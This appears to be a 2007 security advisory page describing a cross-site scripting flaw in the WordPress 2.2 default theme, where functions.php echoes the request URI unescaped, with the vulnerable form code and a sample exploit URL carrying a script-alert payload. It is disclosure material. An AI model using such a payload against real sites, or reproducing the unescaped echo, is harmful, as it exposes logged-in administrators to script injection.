Wordpress default theme XSS (admin) and other problems

2007.06.19

Credit: John Smith

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2007-3241 | CVE-2007-3240 | CVE-2007-3239 | CVE-2007-3238

CWE: CWE-79

There is an XSS in the Wordpress default theme. Tested on WordPress version 2.2
Filename functions.php, line 387.
Code:
<form style="display: inline" method="post" name="hicolor"
id="hicolor" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
$_SERVER['REQUEST_URI'] is directly echoed to the user.
This problem can be exploited if the adminstrator is logged in.
Sample exploit URL.
http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"><scri
pt>alert(1)</script>
There are other XSS vulnerabilities in popular Wordpress themes.
More details on http://www.xssnews.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress default theme XSS (admin) and other problems

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.